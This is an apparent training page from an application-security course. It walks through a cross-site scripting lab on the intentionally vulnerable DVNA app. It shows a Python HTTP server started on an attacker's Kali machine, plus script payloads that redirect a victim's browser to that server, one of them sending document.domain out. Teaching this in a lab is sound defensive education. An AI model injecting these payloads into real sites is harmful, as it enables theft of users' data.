> For the complete documentation index, see [llms.txt](https://infosecgirls.gitbook.io/infosecgirls-training/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infosecgirls.gitbook.io/infosecgirls-training/appsec/web-application-pentesting/a7-cross-site-scripting/advanced-xss-sending-data-to-remote-server.md).

# XSS - Sending data to remote server

**Application Used -  DVNA**

![](/files/-Lye7PotC_LWU0BvgRfP)

![](/files/-Lye7atg7XAh52bq7TBW)

![](/files/-Lye7wpgK4kd8JjxOiDW)

![](/files/-Lye853s6MNM_UnUhZJR)

Run the python server on the kali box (attacker's machine)

```
python -m SimpleHTTPServer 8089
```

<div align="left"><img src="/files/-Lye9S5h7dFi3QjJukrI" alt=""></div>

```
<script>document.location="http://10.0.2.12:8089/?"</script>
```

![](/files/-Lye8zdj3tblnVfycwVm)

![](/files/-Lye9kEY-ZGAeB994eh8)

```
<script>document.location="http://10.0.2.12:8089/?"+document.domain</script>
```

![](/files/-Lye4dU3yAF5kBygtePR)

![](/files/-LyeA7gbcd4pqMV2vGLf)

##
